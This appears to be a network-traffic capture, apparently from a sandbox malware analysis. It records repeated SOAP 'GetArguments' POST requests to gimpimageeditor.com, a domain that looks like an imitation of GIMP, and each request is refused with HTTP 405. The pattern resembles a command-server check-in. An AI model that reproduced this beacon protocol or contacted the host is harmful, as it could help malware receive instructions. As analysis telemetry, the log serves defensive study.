                                                                                                                        Jan 17, 2025 06:52:55.620342016 CET137OUTData Raw: 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 47 65 74 41 72 67 75 6d 65
                                                                                                                        Data Ascii: <s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/"><s:Body><GetArguments xmlns="http://tempuri.org/"/></s:Body></s:Envelope>
                                                                                                                        Jan 17, 2025 06:52:56.623759985 CET216OUTPOST / HTTP/1.1
                                                                                                                        Content-Type: text/xml; charset=utf-8
                                                                                                                        SOAPAction: "http://tempuri.org/Endpoint/GetArguments"
                                                                                                                        Host: gimpimageeditor.com
                                                                                                                        Content-Length: 137
                                                                                                                        Expect: 100-continue
                                                                                                                        Accept-Encoding: gzip, deflate
                                                                                                                        Jan 17, 2025 06:52:56.729336023 CET54INHTTP/1.1 405 Method Not Allowed
                                                                                                                        content-length: 0
                                                                                                                        Jan 17, 2025 06:52:57.732897043 CET216OUTPOST / HTTP/1.1
                                                                                                                        Content-Type: text/xml; charset=utf-8
                                                                                                                        SOAPAction: "http://tempuri.org/Endpoint/GetArguments"
                                                                                                                        Host: gimpimageeditor.com
                                                                                                                        Content-Length: 137
                                                                                                                        Expect: 100-continue
                                                                                                                        Accept-Encoding: gzip, deflate
                                                                                                                        Jan 17, 2025 06:52:57.840838909 CET54INHTTP/1.1 405 Method Not Allowed
                                                                                                                        content-length: 0
                                                                                                                        Jan 17, 2025 06:52:58.842295885 CET216OUTPOST / HTTP/1.1
                                                                                                                        Content-Type: text/xml; charset=utf-8
                                                                                                                        SOAPAction: "http://tempuri.org/Endpoint/GetArguments"
                                                                                                                        Host: gimpimageeditor.com
                                                                                                                        Content-Length: 137
                                                                                                                        Expect: 100-continue
                                                                                                                        Accept-Encoding: gzip, deflate
                                                                                                                        Jan 17, 2025 06:52:58.947622061 CET54INHTTP/1.1 405 Method Not Allowed
                                                                                                                        content-length: 0
                                                                                                                        Jan 17, 2025 06:52:59.951571941 CET216OUTPOST / HTTP/1.1
                                                                                                                        Content-Type: text/xml; charset=utf-8
                                                                                                                        SOAPAction: "http://tempuri.org/Endpoint/GetArguments"
                                                                                                                        Host: gimpimageeditor.com
                                                                                                                        Content-Length: 137
                                                                                                                        Expect: 100-continue
                                                                                                                        Accept-Encoding: gzip, deflate
                                                                                                                        Jan 17, 2025 06:53:00.077532053 CET54INHTTP/1.1 405 Method Not Allowed
                                                                                                                        content-length: 0
                                                                                                                        Jan 17, 2025 06:53:01.092266083 CET216OUTPOST / HTTP/1.1
                                                                                                                        Content-Type: text/xml; charset=utf-8
                                                                                                                        SOAPAction: "http://tempuri.org/Endpoint/GetArguments"
                                                                                                                        Host: gimpimageeditor.com
                                                                                                                        Content-Length: 137
                                                                                                                        Expect: 100-continue
                                                                                                                        Accept-Encoding: gzip, deflate
                                                                                                                        Jan 17, 2025 06:53:01.197765112 CET54INHTTP/1.1 405 Method Not Allowed
                                                                                                                        content-length: 0
                                                                                                                        Jan 17, 2025 06:53:02.201529980 CET216OUTPOST / HTTP/1.1
                                                                                                                        Content-Type: text/xml; charset=utf-8
                                                                                                                        SOAPAction: "http://tempuri.org/Endpoint/GetArguments"
                                                                                                                        Host: gimpimageeditor.com
                                                                                                                        Content-Length: 137
                                                                                                                        Expect: 100-continue
                                                                                                                        Accept-Encoding: gzip, deflate
                                                                                                                        Jan 17, 2025 06:53:02.313082933 CET54INHTTP/1.1 405 Method Not Allowed
                                                                                                                        content-length: 0
                                                                                                                        Jan 17, 2025 06:53:03.326663971 CET216OUTPOST / HTTP/1.1
                                                                                                                        Content-Type: text/xml; charset=utf-8
                                                                                                                        SOAPAction: "http://tempuri.org/Endpoint/GetArguments"
                                                                                                                        Host: gimpimageeditor.com
                                                                                                                        Content-Length: 137
                                                                                                                        Expect: 100-continue
                                                                                                                        Accept-Encoding: gzip, deflate
                                                                                                                        Jan 17, 2025 06:53:03.432178974 CET54INHTTP/1.1 405 Method Not Allowed
                                                                                                                        content-length: 0
                                                                                                                        Jan 17, 2025 06:53:04.436088085 CET216OUTPOST / HTTP/1.1
                                                                                                                        Content-Type: text/xml; charset=utf-8
                                                                                                                        SOAPAction: "http://tempuri.org/Endpoint/GetArguments"
                                                                                                                        Host: gimpimageeditor.com
                                                                                                                        Content-Length: 137
                                                                                                                        Expect: 100-continue
                                                                                                                        Accept-Encoding: gzip, deflate
                                                                                                                        Jan 17, 2025 06:53:04.541470051 CET54INHTTP/1.1 405 Method Not Allowed
                                                                                                                        content-length: 0
                                                                                                                        Jan 17, 2025 06:53:05.548147917 CET216OUTPOST / HTTP/1.1
                                                                                                                        Content-Type: text/xml; charset=utf-8
                                                                                                                        SOAPAction: "http://tempuri.org/Endpoint/GetArguments"
                                                                                                                        Host: gimpimageeditor.com
                                                                                                                        Content-Length: 137
                                                                                                                        Expect: 100-continue
                                                                                                                        Accept-Encoding: gzip, deflate
                                                                                                                        Jan 17, 2025 06:53:05.653629065 CET54INHTTP/1.1 405 Method Not Allowed
                                                                                                                        content-length: 0
                                                                                                                        Jan 17, 2025 06:53:06.670619965 CET216OUTPOST / HTTP/1.1
                                                                                                                        Content-Type: text/xml; charset=utf-8
                                                                                                                        SOAPAction: "http://tempuri.org/Endpoint/GetArguments"
                                                                                                                        Host: gimpimageeditor.com
                                                                                                                        Content-Length: 137
                                                                                                                        Expect: 100-continue
                                                                                                                        Accept-Encoding: gzip, deflate
                                                                                                                        Jan 17, 2025 06:53:06.775815964 CET54INHTTP/1.1 405 Method Not Allowed
                                                                                                                        content-length: 0
                                                                                                                        Jan 17, 2025 06:53:07.779886007 CET216OUTPOST / HTTP/1.1
                                                                                                                        Content-Type: text/xml; charset=utf-8
                                                                                                                        SOAPAction: "http://tempuri.org/Endpoint/GetArguments"
                                                                                                                        Host: gimpimageeditor.com
                                                                                                                        Content-Length: 137
                                                                                                                        Expect: 100-continue
                                                                                                                        Accept-Encoding: gzip, deflate
                                                                                                                        Jan 17, 2025 06:53:07.959919930 CET54INHTTP/1.1 405 Method Not Allowed
                                                                                                                        content-length: 0
                                                                                                                        Jan 17, 2025 06:53:08.967164040 CET216OUTPOST / HTTP/1.1
                                                                                                                        Content-Type: text/xml; charset=utf-8
                                                                                                                        SOAPAction: "http://tempuri.org/Endpoint/GetArguments"
                                                                                                                        Host: gimpimageeditor.com
                                                                                                                        Content-Length: 137
                                                                                                                        Expect: 100-continue
                                                                                                                        Accept-Encoding: gzip, deflate
                                                                                                                        Jan 17, 2025 06:53:09.072896004 CET54INHTTP/1.1 405 Method Not Allowed
                                                                                                                        content-length: 0
                                                                                                                        Jan 17, 2025 06:53:10.076741934 CET216OUTPOST / HTTP/1.1
                                                                                                                        Content-Type: text/xml; charset=utf-8
                                                                                                                        SOAPAction: "http://tempuri.org/Endpoint/GetArguments"
                                                                                                                        Host: gimpimageeditor.com
                                                                                                                        Content-Length: 137
                                                                                                                        Expect: 100-continue
                                                                                                                        Accept-Encoding: gzip, deflate
                                                                                                                        Jan 17, 2025 06:53:10.182617903 CET54INHTTP/1.1 405 Method Not Allowed
                                                                                                                        content-length: 0
                                                                                                                        Jan 17, 2025 06:53:11.185903072 CET216OUTPOST / HTTP/1.1
                                                                                                                        Content-Type: text/xml; charset=utf-8
                                                                                                                        SOAPAction: "http://tempuri.org/Endpoint/GetArguments"
                                                                                                                        Host: gimpimageeditor.com
                                                                                                                        Content-Length: 137
                                                                                                                        Expect: 100-continue
                                                                                                                        Accept-Encoding: gzip, deflate
                                                                                                                        Jan 17, 2025 06:53:11.297015905 CET54INHTTP/1.1 405 Method Not Allowed
                                                                                                                        content-length: 0
                                                                                                                        Jan 17, 2025 06:53:12.310993910 CET216OUTPOST / HTTP/1.1
                                                                                                                        Content-Type: text/xml; charset=utf-8
                                                                                                                        SOAPAction: "http://tempuri.org/Endpoint/GetArguments"
                                                                                                                        Host: gimpimageeditor.com
                                                                                                                        Content-Length: 137
                                                                                                                        Expect: 100-continue
                                                                                                                        Accept-Encoding: gzip, deflate
                                                                                                                        Jan 17, 2025 06:53:12.416781902 CET54INHTTP/1.1 405 Method Not Allowed
                                                                                                                        content-length: 0
                                                                                                                        Jan 17, 2025 06:53:13.420578003 CET216OUTPOST / HTTP/1.1
                                                                                                                        Content-Type: text/xml; charset=utf-8
                                                                                                                        SOAPAction: "http://tempuri.org/Endpoint/GetArguments"
                                                                                                                        Host: gimpimageeditor.com
                                                                                                                        Content-Length: 137
                                                                                                                        Expect: 100-continue
                                                                                                                        Accept-Encoding: gzip, deflate
                                                                                                                        Jan 17, 2025 06:53:13.527098894 CET54INHTTP/1.1 405 Method Not Allowed
                                                                                                                        content-length: 0
                                                                                                                        Jan 17, 2025 06:53:14.529805899 CET216OUTPOST / HTTP/1.1
                                                                                                                        Content-Type: text/xml; charset=utf-8
                                                                                                                        SOAPAction: "http://tempuri.org/Endpoint/GetArguments"
                                                                                                                        Host: gimpimageeditor.com
                                                                                                                        Content-Length: 137
                                                                                                                        Expect: 100-continue
                                                                                                                        Accept-Encoding: gzip, deflate
                                                                                                                        Jan 17, 2025 06:53:14.635246038 CET54INHTTP/1.1 405 Method Not Allowed
                                                                                                                        content-length: 0
                                                                                                                        Jan 17, 2025 06:53:15.639317036 CET216OUTPOST / HTTP/1.1
                                                                                                                        Content-Type: text/xml; charset=utf-8
                                                                                                                        SOAPAction: "http://tempuri.org/Endpoint/GetArguments"
                                                                                                                        Host: gimpimageeditor.com
                                                                                                                        Content-Length: 137
                                                                                                                        Expect: 100-continue
                                                                                                                        Accept-Encoding: gzip, deflate
                                                                                                                        Jan 17, 2025 06:53:15.745646000 CET54INHTTP/1.1 405 Method Not Allowed
                                                                                                                        content-length: 0
                                                                                                                        Jan 17, 2025 06:53:16.748404026 CET216OUTPOST / HTTP/1.1
                                                                                                                        Content-Type: text/xml; charset=utf-8
                                                                                                                        SOAPAction: "http://tempuri.org/Endpoint/GetArguments"
                                                                                                                        Host: gimpimageeditor.com
                                                                                                                        Content-Length: 137
                                                                                                                        Expect: 100-continue
                                                                                                                        Accept-Encoding: gzip, deflate
                                                                                                                        Jan 17, 2025 06:53:16.854811907 CET54INHTTP/1.1 405 Method Not Allowed
                                                                                                                        content-length: 0
                                                                                                                        Jan 17, 2025 06:53:17.857785940 CET216OUTPOST / HTTP/1.1
                                                                                                                        Content-Type: text/xml; charset=utf-8
                                                                                                                        SOAPAction: "http://tempuri.org/Endpoint/GetArguments"
                                                                                                                        Host: gimpimageeditor.com
                                                                                                                        Content-Length: 137
                                                                                                                        Expect: 100-continue
                                                                                                                        Accept-Encoding: gzip, deflate
                                                                                                                        Jan 17, 2025 06:53:17.963527918 CET54INHTTP/1.1 405 Method Not Allowed
                                                                                                                        content-length: 0
                                                                                                                        Jan 17, 2025 06:53:18.967091084 CET216OUTPOST / HTTP/1.1
                                                                                                                        Content-Type: text/xml; charset=utf-8
                                                                                                                        SOAPAction: "http://tempuri.org/Endpoint/GetArguments"
                                                                                                                        Host: gimpimageeditor.com
                                                                                                                        Content-Length: 137
                                                                                                                        Expect: 100-continue
                                                                                                                        Accept-Encoding: gzip, deflate
                                                                                                                        Jan 17, 2025 06:53:19.072510004 CET54INHTTP/1.1 405 Method Not Allowed
                                                                                                                        content-length: 0
                                                                                                                        Jan 17, 2025 06:53:20.076759100 CET216OUTPOST / HTTP/1.1
                                                                                                                        Content-Type: text/xml; charset=utf-8
                                                                                                                        SOAPAction: "http://tempuri.org/Endpoint/GetArguments"
                                                                                                                        Host: gimpimageeditor.com
                                                                                                                        Content-Length: 137
                                                                                                                        Expect: 100-continue
                                                                                                                        Accept-Encoding: gzip, deflate
                                                                                                                        Jan 17, 2025 06:53:20.182404995 CET54INHTTP/1.1 405 Method Not Allowed
                                                                                                                        content-length: 0
                                                                                                                        Jan 17, 2025 06:53:21.209369898 CET216OUTPOST / HTTP/1.1
                                                                                                                        Content-Type: text/xml; charset=utf-8
                                                                                                                        SOAPAction: "http://tempuri.org/Endpoint/GetArguments"
                                                                                                                        Host: gimpimageeditor.com
                                                                                                                        Content-Length: 137
                                                                                                                        Expect: 100-continue
                                                                                                                        Accept-Encoding: gzip, deflate
                                                                                                                        Jan 17, 2025 06:53:21.314785004 CET54INHTTP/1.1 405 Method Not Allowed
                                                                                                                        content-length: 0
                                                                                                                        Jan 17, 2025 06:53:22.295396090 CET216OUTPOST / HTTP/1.1
                                                                                                                        Content-Type: text/xml; charset=utf-8
                                                                                                                        SOAPAction: "http://tempuri.org/Endpoint/GetArguments"
                                                                                                                        Host: gimpimageeditor.com
                                                                                                                        Content-Length: 137
                                                                                                                        Expect: 100-continue
                                                                                                                        Accept-Encoding: gzip, deflate
                                                                                                                        Jan 17, 2025 06:53:22.400969982 CET54INHTTP/1.1 405 Method Not Allowed
                                                                                                                        content-length: 0
                                                                                                                        Jan 17, 2025 06:53:23.342173100 CET216OUTPOST / HTTP/1.1
                                                                                                                        Content-Type: text/xml; charset=utf-8
                                                                                                                        SOAPAction: "http://tempuri.org/Endpoint/GetArguments"
                                                                                                                        Host: gimpimageeditor.com
                                                                                                                        Content-Length: 137
                                                                                                                        Expect: 100-continue
                                                                                                                        Accept-Encoding: gzip, deflate
                                                                                                                        Jan 17, 2025 06:53:23.447941065 CET54INHTTP/1.1 405 Method Not Allowed
                                                                                                                        content-length: 0
                                                                                                                        Jan 17, 2025 06:53:24.357835054 CET216OUTPOST / HTTP/1.1
                                                                                                                        Content-Type: text/xml; charset=utf-8
                                                                                                                        SOAPAction: "http://tempuri.org/Endpoint/GetArguments"
                                                                                                                        Host: gimpimageeditor.com
                                                                                                                        Content-Length: 137
                                                                                                                        Expect: 100-continue
                                                                                                                        Accept-Encoding: gzip, deflate
                                                                                                                        Jan 17, 2025 06:53:24.463390112 CET54INHTTP/1.1 405 Method Not Allowed
                                                                                                                        content-length: 0
                                                                                                                        Jan 17, 2025 06:53:25.342247963 CET216OUTPOST / HTTP/1.1
                                                                                                                        Content-Type: text/xml; charset=utf-8
                                                                                                                        SOAPAction: "http://tempuri.org/Endpoint/GetArguments"
                                                                                                                        Host: gimpimageeditor.com
                                                                                                                        Content-Length: 137
                                                                                                                        Expect: 100-continue
                                                                                                                        Accept-Encoding: gzip, deflate
                                                                                                                        Jan 17, 2025 06:53:25.447688103 CET54INHTTP/1.1 405 Method Not Allowed
                                                                                                                        content-length: 0
                                                                                                                        Jan 17, 2025 06:53:26.295224905 CET216OUTPOST / HTTP/1.1
                                                                                                                        Content-Type: text/xml; charset=utf-8
                                                                                                                        SOAPAction: "http://tempuri.org/Endpoint/GetArguments"
                                                                                                                        Host: gimpimageeditor.com
                                                                                                                        Content-Length: 137
                                                                                                                        Expect: 100-continue
                                                                                                                        Accept-Encoding: gzip, deflate
                                                                                                                        Jan 17, 2025 06:53:26.401437998 CET54INHTTP/1.1 405 Method Not Allowed
                                                                                                                        content-length: 0
                                                                                                                        Jan 17, 2025 06:53:27.232855082 CET216OUTPOST / HTTP/1.1
                                                                                                                        Content-Type: text/xml; charset=utf-8
                                                                                                                        SOAPAction: "http://tempuri.org/Endpoint/GetArguments"
                                                                                                                        Host: gimpimageeditor.com
                                                                                                                        Content-Length: 137
                                                                                                                        Expect: 100-continue
                                                                                                                        Accept-Encoding: gzip, deflate
                                                                                                                        Jan 17, 2025 06:53:27.338599920 CET54INHTTP/1.1 405 Method Not Allowed
                                                                                                                        content-length: 0
                                                                                                                        Jan 17, 2025 06:53:28.139111996 CET216OUTPOST / HTTP/1.1
                                                                                                                        Content-Type: text/xml; charset=utf-8
                                                                                                                        SOAPAction: "http://tempuri.org/Endpoint/GetArguments"
                                                                                                                        Host: gimpimageeditor.com
                                                                                                                        Content-Length: 137
                                                                                                                        Expect: 100-continue
                                                                                                                        Accept-Encoding: gzip, deflate
                                                                                                                        Jan 17, 2025 06:53:28.245574951 CET54INHTTP/1.1 405 Method Not Allowed
                                                                                                                        content-length: 0
                                                                                                                        Jan 17, 2025 06:53:29.014062881 CET216OUTPOST / HTTP/1.1
                                                                                                                        Content-Type: text/xml; charset=utf-8
                                                                                                                        SOAPAction: "http://tempuri.org/Endpoint/GetArguments"
                                                                                                                        Host: gimpimageeditor.com
                                                                                                                        Content-Length: 137
                                                                                                                        Expect: 100-continue
                                                                                                                        Accept-Encoding: gzip, deflate
                                                                                                                        Jan 17, 2025 06:53:29.120743990 CET54INHTTP/1.1 405 Method Not Allowed
                                                                                                                        content-length: 0
                                                                                                                        Jan 17, 2025 06:53:29.873533964 CET216OUTPOST / HTTP/1.1
                                                                                                                        Content-Type: text/xml; charset=utf-8
                                                                                                                        SOAPAction: "http://tempuri.org/Endpoint/GetArguments"
                                                                                                                        Host: gimpimageeditor.com
                                                                                                                        Content-Length: 137
                                                                                                                        Expect: 100-continue
                                                                                                                        Accept-Encoding: gzip, deflate
                                                                                                                        Jan 17, 2025 06:53:29.979861021 CET54INHTTP/1.1 405 Method Not Allowed
                                                                                                                        content-length: 0
                                                                                                                        Jan 17, 2025 06:53:30.701833963 CET216OUTPOST / HTTP/1.1
                                                                                                                        Content-Type: text/xml; charset=utf-8
                                                                                                                        SOAPAction: "http://tempuri.org/Endpoint/GetArguments"
                                                                                                                        Host: gimpimageeditor.com
                                                                                                                        Content-Length: 137
                                                                                                                        Expect: 100-continue
                                                                                                                        Accept-Encoding: gzip, deflate
                                                                                                                        Jan 17, 2025 06:53:30.976066113 CET54INHTTP/1.1 405 Method Not Allowed
                                                                                                                        content-length: 0
                                                                                                                        Jan 17, 2025 06:53:31.670433044 CET216OUTPOST / HTTP/1.1
                                                                                                                        Content-Type: text/xml; charset=utf-8
                                                                                                                        SOAPAction: "http://tempuri.org/Endpoint/GetArguments"
                                                                                                                        Host: gimpimageeditor.com
                                                                                                                        Content-Length: 137
                                                                                                                        Expect: 100-continue
                                                                                                                        Accept-Encoding: gzip, deflate
                                                                                                                        Jan 17, 2025 06:53:31.776460886 CET54INHTTP/1.1 405 Method Not Allowed
                                                                                                                        content-length: 0
                                                                                                                        Jan 17, 2025 06:53:32.451625109 CET216OUTPOST / HTTP/1.1
                                                                                                                        Content-Type: text/xml; charset=utf-8
                                                                                                                        SOAPAction: "http://tempuri.org/Endpoint/GetArguments"
                                                                                                                        Host: gimpimageeditor.com
                                                                                                                        Content-Length: 137
                                                                                                                        Expect: 100-continue
                                                                                                                        Accept-Encoding: gzip, deflate
                                                                                                                        Jan 17, 2025 06:53:32.557650089 CET54INHTTP/1.1 405 Method Not Allowed
                                                                                                                        content-length: 0
                                                                                                                        Jan 17, 2025 06:53:33.217470884 CET216OUTPOST / HTTP/1.1
                                                                                                                        Content-Type: text/xml; charset=utf-8
                                                                                                                        SOAPAction: "http://tempuri.org/Endpoint/GetArguments"
                                                                                                                        Host: gimpimageeditor.com
                                                                                                                        Content-Length: 137
                                                                                                                        Expect: 100-continue
                                                                                                                        Accept-Encoding: gzip, deflate
                                                                                                                        Jan 17, 2025 06:53:33.324500084 CET54INHTTP/1.1 405 Method Not Allowed
                                                                                                                        content-length: 0
                                                                                                                        Jan 17, 2025 06:53:33.951531887 CET216OUTPOST / HTTP/1.1
                                                                                                                        Content-Type: text/xml; charset=utf-8
                                                                                                                        SOAPAction: "http://tempuri.org/Endpoint/GetArguments"
                                                                                                                        Host: gimpimageeditor.com
                                                                                                                        Content-Length: 137
                                                                                                                        Expect: 100-continue
                                                                                                                        Accept-Encoding: gzip, deflate
                                                                                                                        Jan 17, 2025 06:53:34.058366060 CET54INHTTP/1.1 405 Method Not Allowed
                                                                                                                        content-length: 0
                                                                                                                        Jan 17, 2025 06:53:34.670310974 CET216OUTPOST / HTTP/1.1
                                                                                                                        Content-Type: text/xml; charset=utf-8
                                                                                                                        SOAPAction: "http://tempuri.org/Endpoint/GetArguments"
                                                                                                                        Host: gimpimageeditor.com
                                                                                                                        Content-Length: 137
                                                                                                                        Expect: 100-continue
                                                                                                                        Accept-Encoding: gzip, deflate
                                                                                                                        Jan 17, 2025 06:53:34.776581049 CET54INHTTP/1.1 405 Method Not Allowed
                                                                                                                        content-length: 0
                                                                                                                        Jan 17, 2025 06:53:35.373364925 CET216OUTPOST / HTTP/1.1
                                                                                                                        Content-Type: text/xml; charset=utf-8
                                                                                                                        SOAPAction: "http://tempuri.org/Endpoint/GetArguments"
                                                                                                                        Host: gimpimageeditor.com
                                                                                                                        Content-Length: 137
                                                                                                                        Expect: 100-continue
                                                                                                                        Accept-Encoding: gzip, deflate
                                                                                                                        Jan 17, 2025 06:53:35.479177952 CET54INHTTP/1.1 405 Method Not Allowed
                                                                                                                        content-length: 0
                                                                                                                        Jan 17, 2025 06:53:36.045305014 CET216OUTPOST / HTTP/1.1
                                                                                                                        Content-Type: text/xml; charset=utf-8
                                                                                                                        SOAPAction: "http://tempuri.org/Endpoint/GetArguments"
                                                                                                                        Host: gimpimageeditor.com
                                                                                                                        Content-Length: 137
                                                                                                                        Expect: 100-continue
                                                                                                                        Accept-Encoding: gzip, deflate
                                                                                                                        Jan 17, 2025 06:53:36.151109934 CET54INHTTP/1.1 405 Method Not Allowed
                                                                                                                        content-length: 0
                                                                                                                        Jan 17, 2025 06:53:36.701715946 CET216OUTPOST / HTTP/1.1
                                                                                                                        Content-Type: text/xml; charset=utf-8
                                                                                                                        SOAPAction: "http://tempuri.org/Endpoint/GetArguments"
                                                                                                                        Host: gimpimageeditor.com
                                                                                                                        Content-Length: 137
                                                                                                                        Expect: 100-continue
                                                                                                                        Accept-Encoding: gzip, deflate
                                                                                                                        Jan 17, 2025 06:53:36.807332993 CET54INHTTP/1.1 405 Method Not Allowed
                                                                                                                        content-length: 0
                                                                                                                        Jan 17, 2025 06:53:37.342278004 CET216OUTPOST / HTTP/1.1
                                                                                                                        Content-Type: text/xml; charset=utf-8
                                                                                                                        SOAPAction: "http://tempuri.org/Endpoint/GetArguments"
                                                                                                                        Host: gimpimageeditor.com
                                                                                                                        Content-Length: 137
                                                                                                                        Expect: 100-continue
                                                                                                                        Accept-Encoding: gzip, deflate
                                                                                                                        Jan 17, 2025 06:53:37.447731018 CET54INHTTP/1.1 405 Method Not Allowed
                                                                                                                        content-length: 0
                                                                                                                        Jan 17, 2025 06:53:37.967175961 CET216OUTPOST / HTTP/1.1
                                                                                                                        Content-Type: text/xml; charset=utf-8
                                                                                                                        SOAPAction: "http://tempuri.org/Endpoint/GetArguments"
                                                                                                                        Host: gimpimageeditor.com
                                                                                                                        Content-Length: 137
                                                                                                                        Expect: 100-continue
                                                                                                                        Accept-Encoding: gzip, deflate
                                                                                                                        Jan 17, 2025 06:53:38.072849035 CET54INHTTP/1.1 405 Method Not Allowed
                                                                                                                        content-length: 0
                                                                                                                        Jan 17, 2025 06:53:38.576477051 CET216OUTPOST / HTTP/1.1
                                                                                                                        Content-Type: text/xml; charset=utf-8
                                                                                                                        SOAPAction: "http://tempuri.org/Endpoint/GetArguments"
                                                                                                                        Host: gimpimageeditor.com
                                                                                                                        Content-Length: 137
                                                                                                                        Expect: 100-continue
                                                                                                                        Accept-Encoding: gzip, deflate
                                                                                                                        Jan 17, 2025 06:53:38.682405949 CET54INHTTP/1.1 405 Method Not Allowed
                                                                                                                        content-length: 0
                                                                                                                        Jan 17, 2025 06:53:39.170480013 CET216OUTPOST / HTTP/1.1
                                                                                                                        Content-Type: text/xml; charset=utf-8
                                                                                                                        SOAPAction: "http://tempuri.org/Endpoint/GetArguments"
                                                                                                                        Host: gimpimageeditor.com
                                                                                                                        Content-Length: 137
                                                                                                                        Expect: 100-continue
                                                                                                                        Accept-Encoding: gzip, deflate
                                                                                                                        Jan 17, 2025 06:53:39.276102066 CET54INHTTP/1.1 405 Method Not Allowed
                                                                                                                        content-length: 0
                                                                                                                        Jan 17, 2025 06:53:39.748259068 CET216OUTPOST / HTTP/1.1
                                                                                                                        Content-Type: text/xml; charset=utf-8
                                                                                                                        SOAPAction: "http://tempuri.org/Endpoint/GetArguments"
                                                                                                                        Host: gimpimageeditor.com
                                                                                                                        Content-Length: 137
                                                                                                                        Expect: 100-continue
                                                                                                                        Accept-Encoding: gzip, deflate
                                                                                                                        Jan 17, 2025 06:53:39.853944063 CET54INHTTP/1.1 405 Method Not Allowed
                                                                                                                        content-length: 0
                                                                                                                        Jan 17, 2025 06:53:40.310937881 CET216OUTPOST / HTTP/1.1
                                                                                                                        Content-Type: text/xml; charset=utf-8
                                                                                                                        SOAPAction: "http://tempuri.org/Endpoint/GetArguments"
                                                                                                                        Host: gimpimageeditor.com
                                                                                                                        Content-Length: 137
                                                                                                                        Expect: 100-continue
                                                                                                                        Accept-Encoding: gzip, deflate
                                                                                                                        Jan 17, 2025 06:53:40.416421890 CET54INHTTP/1.1 405 Method Not Allowed
                                                                                                                        content-length: 0
                                                                                                                        Jan 17, 2025 06:53:40.857711077 CET216OUTPOST / HTTP/1.1
                                                                                                                        Content-Type: text/xml; charset=utf-8
                                                                                                                        SOAPAction: "http://tempuri.org/Endpoint/GetArguments"
                                                                                                                        Host: gimpimageeditor.com
                                                                                                                        Content-Length: 137
                                                                                                                        Expect: 100-continue
                                                                                                                        Accept-Encoding: gzip, deflate
                                                                                                                        Jan 17, 2025 06:53:40.963970900 CET54INHTTP/1.1 405 Method Not Allowed
                                                                                                                        content-length: 0
                                                                                                                        Jan 17, 2025 06:53:41.389132023 CET216OUTPOST / HTTP/1.1
                                                                                                                        Content-Type: text/xml; charset=utf-8
                                                                                                                        SOAPAction: "http://tempuri.org/Endpoint/GetArguments"
                                                                                                                        Host: gimpimageeditor.com
                                                                                                                        Content-Length: 137
                                                                                                                        Expect: 100-continue
                                                                                                                        Accept-Encoding: gzip, deflate
                                                                                                                        Jan 17, 2025 06:53:41.495105982 CET54INHTTP/1.1 405 Method Not Allowed
                                                                                                                        content-length: 0
                                                                                                                        Jan 17, 2025 06:53:41.905000925 CET216OUTPOST / HTTP/1.1
                                                                                                                        Content-Type: text/xml; charset=utf-8
                                                                                                                        SOAPAction: "http://tempuri.org/Endpoint/GetArguments"
                                                                                                                        Host: gimpimageeditor.com
                                                                                                                        Content-Length: 137
                                                                                                                        Expect: 100-continue
                                                                                                                        Accept-Encoding: gzip, deflate
                                                                                                                        Jan 17, 2025 06:53:42.010983944 CET54INHTTP/1.1 405 Method Not Allowed
                                                                                                                        content-length: 0
                                                                                                                        Jan 17, 2025 06:53:42.404814005 CET216OUTPOST / HTTP/1.1
                                                                                                                        Content-Type: text/xml; charset=utf-8
                                                                                                                        SOAPAction: "http://tempuri.org/Endpoint/GetArguments"
                                                                                                                        Host: gimpimageeditor.com
                                                                                                                        Content-Length: 137
                                                                                                                        Expect: 100-continue
                                                                                                                        Accept-Encoding: gzip, deflate
                                                                                                                        Jan 17, 2025 06:53:42.510662079 CET54INHTTP/1.1 405 Method Not Allowed
                                                                                                                        content-length: 0
                                                                                                                        Jan 17, 2025 06:53:42.889292002 CET216OUTPOST / HTTP/1.1
                                                                                                                        Content-Type: text/xml; charset=utf-8
                                                                                                                        SOAPAction: "http://tempuri.org/Endpoint/GetArguments"
                                                                                                                        Host: gimpimageeditor.com
                                                                                                                        Content-Length: 137
                                                                                                                        Expect: 100-continue
                                                                                                                        Accept-Encoding: gzip, deflate
                                                                                                                        Jan 17, 2025 06:53:42.994890928 CET54INHTTP/1.1 405 Method Not Allowed
                                                                                                                        content-length: 0
                                                                                                                        Jan 17, 2025 06:53:43.373269081 CET216OUTPOST / HTTP/1.1
                                                                                                                        Content-Type: text/xml; charset=utf-8
                                                                                                                        SOAPAction: "http://tempuri.org/Endpoint/GetArguments"
                                                                                                                        Host: gimpimageeditor.com
                                                                                                                        Content-Length: 137
                                                                                                                        Expect: 100-continue
                                                                                                                        Accept-Encoding: gzip, deflate
                                                                                                                        Jan 17, 2025 06:53:43.478837013 CET54INHTTP/1.1 405 Method Not Allowed
                                                                                                                        content-length: 0
                                                                                                                        Jan 17, 2025 06:53:43.842629910 CET216OUTPOST / HTTP/1.1
                                                                                                                        Content-Type: text/xml; charset=utf-8
                                                                                                                        SOAPAction: "http://tempuri.org/Endpoint/GetArguments"
                                                                                                                        Host: gimpimageeditor.com
                                                                                                                        Content-Length: 137
                                                                                                                        Expect: 100-continue
                                                                                                                        Accept-Encoding: gzip, deflate
                                                                                                                        Jan 17, 2025 06:53:43.948839903 CET54INHTTP/1.1 405 Method Not Allowed
                                                                                                                        content-length: 0
                                                                                                                        Jan 17, 2025 06:53:44.295281887 CET216OUTPOST / HTTP/1.1
                                                                                                                        Content-Type: text/xml; charset=utf-8
                                                                                                                        SOAPAction: "http://tempuri.org/Endpoint/GetArguments"
                                                                                                                        Host: gimpimageeditor.com
                                                                                                                        Content-Length: 137
                                                                                                                        Expect: 100-continue
                                                                                                                        Accept-Encoding: gzip, deflate
                                                                                                                        Jan 17, 2025 06:53:44.401406050 CET54INHTTP/1.1 405 Method Not Allowed
                                                                                                                        content-length: 0
                                                                                                                        Jan 17, 2025 06:53:44.733510971 CET216OUTPOST / HTTP/1.1
                                                                                                                        Content-Type: text/xml; charset=utf-8
                                                                                                                        SOAPAction: "http://tempuri.org/Endpoint/GetArguments"
                                                                                                                        Host: gimpimageeditor.com
                                                                                                                        Content-Length: 137
                                                                                                                        Expect: 100-continue
                                                                                                                        Accept-Encoding: gzip, deflate
                                                                                                                        Jan 17, 2025 06:53:44.838865995 CET54INHTTP/1.1 405 Method Not Allowed
                                                                                                                        content-length: 0
                                                                                                                        Jan 17, 2025 06:53:45.170202017 CET216OUTPOST / HTTP/1.1
